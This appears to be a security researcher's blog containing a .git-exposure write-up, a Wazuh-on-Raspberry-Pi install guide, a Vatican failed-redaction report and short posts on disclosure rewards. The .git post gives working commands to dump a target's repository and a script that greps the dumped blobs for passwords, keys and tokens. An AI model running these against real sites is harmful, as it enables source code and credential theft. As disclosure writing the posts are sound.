Blog

  • Source code disclosure via exposed .git


    This is my write-up on a misconfigured .git repository I found during my day off, and how exploitation of this vulnerability can amount to source code disclosure. During my day off I took a brief look at a particular vendor my employer was in the process of procuring a new service from. I quickly identified what appeared to be an exposed .git repository, which I was able to provisionally validate over HTTP. Whilst I wasn't able to browse the .git folder itself, as directory indexing is disabled on the server, I was able to confirm that individual files within the repository were accessible:

        Example #1: https://[TARGET]/.git/config
        Example #2: https://[TARGET]/.git/logs/HEAD

    Here I will walk through how we can extract the contents of a repository like this to help identify the impact of a vulnerability such as source code disclosure, with a clear PoC.

    To dump this repository locally for analysis, and to help quantify the number of objects within it, we can use the Dumper tool from GitTools:

        git clone https://github.com/internetwache/GitTools.git
        cd GitTools/Dumper
        ./gitdumper.sh https://[TARGET]/.git/ ~/target

    To view a summary of the file tree:

        cd ~/target
        tree -a .git/objects

    The files within the repository are identified by their corresponding hash values, though the full hash for each object also includes the two characters of its corresponding subfolder within the tree. This means we need to prepend the subfolder name to the file name to complete the 40-character hash string. We can pull these 40-character hashes by concatenating the subfolder name with the file name using find, then piping the results into the format we want with awk:

        find .git/objects -type f | awk -F/ '{print $3$4}'

    We can use a for loop to identify the type of every file within the objects directory:

        for i in $(find .git/objects -type f | awk -F/ '{print $3$4}'); do git cat-file -t $i; done

    Here we can see these objects consist of a number of trees, commits, and blobs (binary large objects). In this example, I calculated a total of:

        1,276 trees
        910 commits
        923 blobs

    By default, git stores objects in .git/objects as their original contents, compressed using the zlib library. This means we cannot view objects in a text editor as-is, and must instead rely on alternatives such as git cat-file.

    We can check the type of each of these files individually using its identified hash:

        git cat-file -t [FULL FILE HASH]

    We can preview the contents of each of these files individually using its identified hash:

        git cat-file -p [FULL FILE HASH] | head

    In my last example, we can see this particular blob contains PHP code. As PHP is a server-side scripting language (almost like a blueprint of backend functionality), this evidences that server-side source code is exposed within this repository. The impact can vary depending on the purpose of the functionality and the volume of code, but in my experience it often results in the exposure of backend configuration settings, hardcoded credentials (such as usernames and passwords), API tokens, and other endpoints. If any proprietary software components rely on this repository, then source code disclosure of this type can also present a number of issues relating to theft of intellectual property.

    This finding was duly reported to the affected vendor within 24 hours of being identified.
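    As an addendum: to save checking every object by hand, the per-object steps above can be combined into a short script. This is a minimal sketch built from the same find/awk/cat-file commands already shown, run from the dumped repository root (~/target); the grep search terms are purely illustrative examples, not an exhaustive secrets list:

        # Tally how many objects of each type the dumped repository contains
        find .git/objects -type f | awk -F/ '{print $3$4}' | while read -r hash; do
            git cat-file -t "$hash"
        done | sort | uniq -c

        # Flag any blob whose contents match candidate secret keywords
        find .git/objects -type f | awk -F/ '{print $3$4}' | while read -r hash; do
            if [ "$(git cat-file -t "$hash")" = "blob" ]; then
                git cat-file -p "$hash" | grep -qiE 'password|passwd|secret|api[_-]?key|token' \
                    && echo "possible secret in blob $hash"
            fi
        done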

  • My limited edition print art collection


    Over the years I've collected a number of prints from a particular artist: David Ambarzumjan, an incredibly talented painter from Germany who combines abstract and surrealistic elements to express his fascination with nature in all its diversity and unpredictability. His works can be found in private collections and exhibitions all around the world, some of which I've been lucky enough to acquire for decorative placements throughout my home. Here I've documented some of the limited edition prints I've acquired from his Brushstrokes in Time collection, along with any I'm still interested in buying. I'll endeavour to update this blog post whenever I'm successful in my efforts.

        THIS WAS WATER (1/100)
        ZEBRA CROSSING (15/50)
        SHARKS IN MONTMARTRE (6/50)
        WATERSHED (6/100)
        STRAY (8/50)
        HUMAN NATURE (OPEN EDITION)
        RECOVER (OPEN EDITION)
        BREATHE (**SEEKING**)
        GEZEITENWELLE (97/100)

    If you have any of these limited edition prints which I've listed as **SEEKING** that you would be willing to sell, please feel free to reach out to me via my contact form with offers.

  • How to install a Wazuh SIEM server on a Raspberry Pi 4B


    With many security professionals now working remotely from home, some are looking at ways to improve the network and endpoint security of their home environment. Commercial SIEM solutions are often considered too costly and complicated to deploy, but free, lightweight, open-source solutions with minimal overhead such as Wazuh provide a good compromise for those of modest means aiming to mature the security of their home or small business environment.

    This is my walkthrough on how to install the Wazuh server manager onto a Raspberry Pi 4B as an all-in-one deployment. I noticed there was no clear guidance online on how to go about doing this for a Raspberry Pi 4B, only a significant number of online posts outlining the installation and deployment difficulties people have faced. So here I've decided to document the process I took, tested and validated from start to finish, with clear directions anyone can follow.

    By following this guide you can run your own open-source SIEM solution on a Raspberry Pi 4B at home. This is great not only for existing security professionals looking to improve the resiliency of their home setup, but also for those new to the information security industry seeking hands-on experience in SIEM deployment, management, and other SIEM/SOC related activities.

    Getting started

    To get started, I used a Raspberry Pi 4B with 8GB RAM and a 128GB SanDisk Extreme SD card for storage. Whilst the Raspberry Pi 4B I used for this project was custom built from TurboPi with high-end hardware for this particular purpose, any Raspberry Pi 4B with adequate hardware capable of running Raspbian OS (buster or greater) leveraging the AArch64 64-bit extension of the ARM architecture should be sufficient.

    Walkthrough

    Install a Raspberry Pi 64-bit ARM OS

    First download and install the official Raspberry Pi Imager. Now download the latest Raspi OS ARM64 .zip image from the official repo (make sure it's the latest version). Open the Raspberry Pi Imager application. Select the CHOOSE OS button and in the dropdown list select the Use custom option. Select the Raspi OS ARM64 .zip file you just downloaded. Select the SD storage card to write this to. Proceed with the prompted erasure, formatting, and writing activities to install the OS to your SD card.

    The last step here is to write an empty text file named 'ssh' (no file extension) to the root directory of the SD card. When the device boots and sees the 'ssh' file present, it will automatically enable SSH, which will allow us to remotely access the device command line in a headless state.

    Identify your Raspberry Pi local IP address

    For this I use a Kali VM in VirtualBox, but any flavour of Linux distro can achieve the same. As the guest VM is not visible to the host under the default VirtualBox NAT settings, you need to change your VM network settings to bridge the network adapter between your host machine and the guest VM. Once the network adapter is bridged, we need to identify the Raspberry Pi IP address on the network. There are a few ways to do this (such as logging directly into the router), but we can also use the arp command with the -na flag to display the local network address translation tables and pipe the output through grep to pull any MAC addresses that begin with the identifiers we're interested in:

        arp -na | grep -i dc:a6:32

    Raspberry Pi MAC addresses always use the same OUI (Organizationally Unique Identifier): b8:27:eb for all Raspberry Pi devices except the Raspberry Pi 4B, which uses dc:a6:32.
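    As an aside, if the device doesn't yet appear in your arp cache, an active sweep can populate it. This is a hedged alternative assuming the arp-scan tool is installed on your scanning VM:

        # Actively scan the local subnet and filter for Raspberry Pi OUIs
        sudo arp-scan --localnet | grep -iE 'b8:27:eb|dc:a6:32'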
    Connecting to the Raspberry Pi

    Now that we have the device IP address (in this example mine is assigned 192.168.1.93), we can SSH into it using the default credentials (username pi, password raspberry) and get started:

        ssh pi@192.168.1.93

    Change hostname and update

    First you may wish to change the hostname from raspberry to wazuh (or something else). To do this, run the command sudo raspi-config and navigate to System Options > Hostname using the GUI. Type in your desired hostname and hit Enter, then return to the main menu of the GUI and select Update. Once the device has finished updating, navigate to the Finish button to save your new raspi-config settings. For the hostname change to take effect, reboot the device using the command sudo reboot, then SSH back in using the same credentials once the reboot is complete.

    Enable login as root

    If you want to log in as root using SSH or WinSCP, you need to edit the SSHD config. Log in and edit the sshd_config file:

        sudo nano /etc/ssh/sshd_config

    Find the line containing:

        PermitRootLogin prohibit-password

    Edit this to read:

        PermitRootLogin yes

    Save and close the file, then reboot or restart the sshd service:

        /etc/init.d/ssh restart

    Set a root password if there isn't one already:

        sudo passwd root

    Now you can log in as root (I recommend using a strong password or SSH keys). Proceed to sudo up using sudo su and continue the next steps as root.

    Update the Raspberry Pi packages

    To update the Raspberry Pi, first ensure the VM you're connecting from over SSH has an Internet connection, then run:

        apt update && apt upgrade -y

    Once the update and upgrade process is complete, pull down the required packages for the next steps:

        apt-get install apt-transport-https zip unzip curl gnupg wget libcap2-bin software-properties-common lsb-release -y

    Install Java 11

        echo 'deb http://deb.debian.org/debian stretch-backports main' > /etc/apt/sources.list.d/backports.list
        apt update -y
        apt install openjdk-11-jdk -y

    Install Elasticsearch OSS

    Fetch the Elasticsearch OSS arm64 installation package:

        wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-oss-7.10.2-arm64.deb

    Install the Elasticsearch OSS package:

        dpkg -i elasticsearch-oss-7.10.2-arm64.deb

    Install Open Distro for Elasticsearch

    Download and add the signing keys for the repositories:

        wget -qO - https://d3g5vo6xdbdb9a.cloudfront.net/GPG-KEY-opendistroforelasticsearch | sudo apt-key add -
        wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -

    Add the repository definitions:

        echo "deb https://d3g5vo6xdbdb9a.cloudfront.net/apt stable main" | sudo tee -a /etc/apt/sources.list.d/opendistroforelasticsearch.list

    Update the packages:

        apt-get update -y

    Install the Open Distro for Elasticsearch package:

        apt install opendistroforelasticsearch -y

    Configure and run Elasticsearch

    Run the following command to download the configuration file to /etc/elasticsearch/elasticsearch.yml:

        curl -so /etc/elasticsearch/elasticsearch.yml https://packages.wazuh.com/resources/4.2/open-distro/elasticsearch/7.x/elasticsearch_all_in_one.yml

    Now we need to add users and roles in order to use the Wazuh Kibana plugin properly.
    Run the following commands to add the Wazuh users and additional roles in Kibana:

        curl -so /usr/share/elasticsearch/plugins/opendistro_security/securityconfig/roles.yml https://packages.wazuh.com/resources/4.2/open-distro/elasticsearch/roles/roles.yml
        curl -so /usr/share/elasticsearch/plugins/opendistro_security/securityconfig/roles_mapping.yml https://packages.wazuh.com/resources/4.2/open-distro/elasticsearch/roles/roles_mapping.yml
        curl -so /usr/share/elasticsearch/plugins/opendistro_security/securityconfig/internal_users.yml https://packages.wazuh.com/resources/4.2/open-distro/elasticsearch/roles/internal_users.yml

    Remove the demo certificates:

        rm /etc/elasticsearch/esnode-key.pem /etc/elasticsearch/esnode.pem /etc/elasticsearch/kirk-key.pem /etc/elasticsearch/kirk.pem /etc/elasticsearch/root-ca.pem -f

    Download wazuh-cert-tool.sh and its instances file:

        curl -so ~/wazuh-cert-tool.sh https://packages.wazuh.com/resources/4.2/open-distro/tools/certificate-utility/wazuh-cert-tool.sh
        curl -so ~/instances.yml https://packages.wazuh.com/resources/4.2/open-distro/tools/certificate-utility/instances_aio.yml

    Run wazuh-cert-tool.sh to generate the certificates:

        bash ~/wazuh-cert-tool.sh

    Move the Elasticsearch certificates to their corresponding location for deployment:

        mkdir /etc/elasticsearch/certs/
        mv ~/certs/elasticsearch* /etc/elasticsearch/certs/
        mv ~/certs/admin* /etc/elasticsearch/certs/
        cp ~/certs/root-ca* /etc/elasticsearch/certs/

    Enable and start the Elasticsearch service:

        systemctl daemon-reload
        systemctl enable elasticsearch
        systemctl start elasticsearch

    Run the Elasticsearch securityadmin script to load the new certificate information and start the cluster:

        export ES_JAVA_HOME=/usr/share/elasticsearch/jdk/ && /usr/share/elasticsearch/plugins/opendistro_security/tools/securityadmin.sh -cd /usr/share/elasticsearch/plugins/opendistro_security/securityconfig/ -nhnv -cacert /etc/elasticsearch/certs/root-ca.pem -cert /etc/elasticsearch/certs/admin.pem -key /etc/elasticsearch/certs/admin-key.pem

    Run the following command to confirm the installation is successful:

        curl -XGET https://localhost:9200 -u admin:admin -k

    A successful response returns a JSON object containing the node name, cluster name, and Elasticsearch version details.

    The Open Distro for Elasticsearch performance analyzer plugin is installed by default and can have a negative impact on system resources. The official Wazuh documentation recommends removing it with the following command and restarting the Elasticsearch service afterwards:

        /usr/share/elasticsearch/bin/elasticsearch-plugin remove opendistro-performance-analyzer
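    One practical note on the steps above: on modest hardware like a Raspberry Pi, Elasticsearch can take a while to come up after systemctl start, and the securityadmin script and curl check will fail if run too early. This is a small hedged helper to poll the endpoint before continuing; the retry count and interval are arbitrary choices:

        # Poll until Elasticsearch answers on port 9200 (up to ~5 minutes)
        for i in $(seq 1 30); do
            curl -s -k -u admin:admin https://localhost:9200 >/dev/null && { echo "Elasticsearch is up"; break; }
            echo "Waiting for Elasticsearch (attempt $i/30)..."
            sleep 10
        done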
    Install and run the Wazuh manager

    Install the GPG key:

        curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add -

    Add the repository definition:

        echo "deb https://packages.wazuh.com/4.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list

    Update the Wazuh packages:

        apt-get update -y

    Install the Wazuh manager package:

        apt-get install wazuh-manager

    Enable and start the Wazuh manager service:

        systemctl daemon-reload
        systemctl enable wazuh-manager
        systemctl start wazuh-manager

    Run the following command to check if the Wazuh manager is active:

        systemctl status wazuh-manager

    The output should show the service as active (running).

    Install and configure Filebeat

    Add the repository definition:

        echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list

    Fetch the Filebeat arm64 installation package:

        wget https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-oss-7.12.1-arm64.deb

    Install the Filebeat package:

        dpkg -i filebeat-oss-7.12.1-arm64.deb

    Download the pre-configured Filebeat config file used to forward Wazuh alerts to Elasticsearch:

        curl -so /etc/filebeat/filebeat.yml https://packages.wazuh.com/resources/4.2/open-distro/filebeat/7.x/filebeat_all_in_one.yml

    Download the alerts template for Elasticsearch:

        curl -so /etc/filebeat/wazuh-template.json https://raw.githubusercontent.com/wazuh/wazuh/4.2/extensions/elasticsearch/7.x/wazuh-template.json
        chmod go+r /etc/filebeat/wazuh-template.json

    Download the Wazuh module for Filebeat:

        curl -s https://packages.wazuh.com/4.x/filebeat/wazuh-filebeat-0.1.tar.gz | tar -xvz -C /usr/share/filebeat/module

    Copy the Elasticsearch certificates into /etc/filebeat/certs:

        mkdir /etc/filebeat/certs
        cp ~/certs/root-ca.pem /etc/filebeat/certs/
        mv ~/certs/filebeat* /etc/filebeat/certs/

    Enable and start the Filebeat service:

        systemctl daemon-reload
        systemctl enable filebeat
        systemctl start filebeat

    To ensure that Filebeat has been successfully installed, run:

        filebeat test output

    Each connection check in the output should report ok.

    Install and configure Kibana

    Install the Kibana package:

        apt-get install opendistroforelasticsearch-kibana

    Download the Kibana configuration file:

        curl -so /etc/kibana/kibana.yml https://packages.wazuh.com/resources/4.2/open-distro/kibana/7.x/kibana_all_in_one.yml

    Create the /usr/share/kibana/data directory:

        mkdir /usr/share/kibana/data
        chown -R kibana:kibana /usr/share/kibana

    Install the Wazuh Kibana plugin. The installation of the plugin must be done from the Kibana home directory as follows:

        cd /usr/share/kibana
        sudo -u kibana /usr/share/kibana/bin/kibana-plugin install https://packages.wazuh.com/4.x/ui/kibana/wazuh_kibana-4.2.5_7.10.2-1.zip

    Copy the Elasticsearch certificates into the Kibana configuration folder:

        mkdir /etc/kibana/certs
        cp ~/certs/root-ca.pem /etc/kibana/certs/
        mv ~/certs/kibana* /etc/kibana/certs/
        chown kibana:kibana /etc/kibana/certs/*

    Link Kibana's socket to privileged port 443:

        setcap 'cap_net_bind_service=+ep' /usr/share/kibana/node/bin/node

    Enable and start the Kibana service:

        systemctl daemon-reload
        systemctl enable kibana
        systemctl start kibana

    Check the Kibana service status to ensure it's running:

        systemctl status kibana

    The output should show the service as active (running).

    Open the Kibana interface

    Visit the Raspberry Pi 4B device IP address in your browser (e.g. my interface is reachable at https://192.168.1.93). Upon first access to Kibana, the browser shows a warning message stating that the certificate was not issued by a trusted authority.
    An exception can be added in the advanced options of the web browser or, for increased security, the root-ca.pem file previously generated can be imported to the certificate manager of the browser. Alternatively, a certificate from a trusted authority can be configured.

    Log in to Kibana using the default username admin with the password admin. For security purposes I recommend these credentials are changed.

    Change the default passwords

    To change the default credentials for all users residing in the internal_users.yml file, run the following command (the wazuh-passwords-tool.sh script is available from the official Wazuh resources):

        bash wazuh-passwords-tool.sh -a

    The output will include the newly generated password for each user. Remember to take note of these credentials, or save them into a password manager if you have one.

    Next we also need to update the credentials for Filebeat and Kibana (if these were not already covered by the wazuh-passwords-tool.sh script). Open and update the Filebeat configuration file:

        nano /etc/filebeat/filebeat.yml

    Change the associated password: value. Make sure you make a record of this, then save and exit.

    Open and update the Kibana configuration file:

        nano /etc/kibana/kibana.yml

    Change the associated elasticsearch.password: value. Make sure you make a record of this, then save and exit.

    Restart all services for the changes to take effect:

        systemctl restart wazuh-manager
        systemctl restart filebeat
        systemctl restart kibana

    Congratulations, you've now installed the Wazuh server manager onto your Raspberry Pi. Now you can install the Wazuh agents on any devices you want to onboard, and monitor security related events from within the server manager interface. The Wazuh agent installation guide is relatively simple and can be found here (a minimal example for a Debian endpoint is sketched below). I hope this tutorial helped.
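    As referenced above, here is a minimal sketch of onboarding a Debian-based endpoint as a Wazuh agent. It reuses the same Wazuh 4.x apt repository added earlier in this guide; the manager address is my example Raspberry Pi IP, and WAZUH_MANAGER is the deployment variable the agent package reads at install time (check the official Wazuh agent guide for your platform):

        # On the endpoint to be monitored (Debian/Ubuntu), add the Wazuh repository
        curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add -
        echo "deb https://packages.wazuh.com/4.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
        apt-get update

        # Install the agent, pointing it at the Wazuh manager (our Raspberry Pi)
        WAZUH_MANAGER="192.168.1.93" apt-get install wazuh-agent -y

        # Enable and start the agent service
        systemctl daemon-reload
        systemctl enable wazuh-agent
        systemctl start wazuh-agent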

  • I hacked the Ministry of Defence so they sent me this coin

    • General
    • by Jacob Riggs
    • 28-09-2021

    The UK Ministry of Defence (MoD) sent me a VDP challenge coin for my finding and responsible disclosure of a critical (9.6 CVSS) severity vulnerability. Together with the coin was a small thank you note.

        Thank you! The Ministry of Defence takes the security of our systems seriously. To show our appreciation for all your time and effort, we would like to reward you with a Vulnerability Disclosure hacker coin.

    This echoes a similar response to when I hacked the Dutch government and they sent me a t-shirt.

  • How I stumbled over a vulnerability in the Vatican


    This is my write-up and walkthrough for a simple, low-complexity, but potentially high-impact vulnerability I identified within files hosted on the Vatican web app.

    This started with me looking for a domain to set up a dedicated BIND9 service on a new DNS server I was building. For reasons I won't go into here, I wanted one for a particular use-case that leveraged the .va top-level domain (TLD). However, I quickly encountered a problem...

    I couldn't register a .va domain

    Different countries each have their own country code TLD. Generally, most countries allow individuals outside of their citizenry to register domains using their country code TLD. However, the .va TLD is reserved for the State of the Vatican City, is administered by the Internet Office of the Holy See (the Pope), and registrations are not permitted to those outside of the Vatican's administration.

    Having learned this from a few Google searches, and not knowing much about the Vatican, I decided to do some further research to see if there was any legitimate way around this. Perhaps an application form I could fill out? A higher fee I could pay? Maybe a contact number for the Pope so I could seek his blessing? I looked around the Vatican's official website located at https://vatican.va for some support. In doing so, I stumbled across the https://supportoposta.vatican.va subdomain, which seemed to point to a directory hosting internal user guides in PDF format for webmail configuration. Not exactly what I was looking for, but I was curious why this was publicly accessible. Internal user guides, whilst not always sensitive, can often allow attackers during their recon to learn a lot about the tools and technologies upon which a target organisation relies. I decided to check what information these configuration files contained. Two example pages are included below:

    Everything was in Italian. I can’t read Italian, and for obvious reasons was reluctant to start uploading text I couldn't understand from internal Vatican government files into a US-based cloud translator (such as Google Translate). Fortunately, the screenshot images were clear, and having a background in IT meant I was already familiar with much of the mail-client configuration steps the documentation outlined. But something stood out to me: the blue-box redactions within the screenshots seemed too familiar. Why? Because I recognised these as the same blue boxes MS Word defaults to when inserting rectangular shapes into a document. This told me the PDF files hosted on the site were originally created in MS Word and likely exported from MS Word into PDF format. Why is this important? Because exporting MS Word documents to PDF doesn't flatten embedded content layers.

    Redacting an MS Word document

    The key to understanding how sensitive data can be embedded in a PDF document is that information hidden or covered in an electronic document can easily be recovered. The solution is to ensure that sensitive information is not just visually hidden or made illegible, but is actually deleted from the source file. In some documents, deleting sections can cause an undesirable reflow of text and graphics. If document formatting is a critical issue, this document provides some methods for maintaining that formatting.

    I checked if the redaction layers were removable by simply copying the embedded content back into an MS Word document, then selecting those layers and deleting them. It worked.
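    A quick way to test for this kind of failed redaction, without round-tripping through MS Word, is to extract the PDF's text layer directly: overlay shapes aren't text, so anything merely covered by a box still shows up. A minimal sketch using pdftotext from poppler-utils (the filename here is illustrative):

        # Dump the text layer to stdout; 'redacted' text hidden under an
        # overlay shape will still appear if it remains embedded in the file
        pdftotext userguide.pdf -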
    But there were multiple PDF files with many redactions that I couldn’t translate, so to speed things up I did what I thought cyber Jesus would do. I downloaded everything, used local OCR (Optical Character Recognition) software to extract all text data from the files, and parsed the output through a translator to generate new editable documents in English. After removing the redactions and reviewing all the user guides properly in English, I identified three to be of potential value to an attacker. Whilst these files are unredacted copies of their originals, I opted to manually blur out any residual data I felt could enable an adversary to identify data subjects.

        Zimbra MFA Config
        Shared Calendar Config
        Mail Encryption Config

    As can be seen within the partially redacted versions of these documents (I manually removed all PII), they expose:

        A 2FA backup code allowing an attacker to generate valid one-time 2FA codes
        A 1024-bit PGP private key
        The PGP private key passphrase for decryption and message signing
        Internal directory paths for CalDAV configuration
        Internal email communications
        Internal calendar schedules
        Names and email addresses of internal staff

    Conclusion

    I feel it worth noting that this type of oversight, which can amount to sensitive data exposure, remains as prevalent today as it was over a decade ago. Redaction failures are still commonly reported in the media, and this highlights the ongoing technical challenges associated with what traditionally only required a black pen and paper. The key take-away from this, albeit an obvious one, is that humans are naturally fallible and we all make mistakes. The document publisher, where potentially identified, should not be the subject of focus, but rather the adopted redaction practice and process itself. I hope that by documenting this report here it might help raise awareness of this issue and prevent others from making the same mistake in the future.

    Repeat attempts were made to contact the Vatican regarding this report over the course of three months. They were also served adequate prior notice of this write-up. I will update this blog post should I receive a response.

  • I hacked the Dutch government and all I got was this t-shirt

    • General
    • by Jacob Riggs
    • 04-05-2021

    The NCSC-NL (National Cyber Security Centre – Netherlands) sent me a ‘lousy’ t-shirt on behalf of the Dutch government. Together with the t-shirt was a thank you letter.

        Thank you for bringing a vulnerability to our attention. Together with vulnerability reporters like you we can increase the resilience of Dutch society in the digital domain and better protect our systems and systems of our partners.

    This was a pleasant response to receive and illustrates a far better approach to engaging with ethical hackers than traditional threats of prosecution. However, there’s been some past controversy within the security community on whether this type of reward disincentivises ethical hacker participation by undermining the value inherent in VDP and bug bounty programs. Some argue that the effort researchers need to invest in helping to find and responsibly report vulnerabilities to government organisations far outweighs the level of compensation value these novelty rewards are worth. My view is that expectations should be managed realistically, and maybe the focus should shift away from pursuing personal gain to instead encouraging wider public sector adoption of better security practices. I’m happy with my t-shirt and appreciate the efforts the NCSC-NL went to. It’s certainly a better response than some of the other governments I’ve reported vulnerabilities to.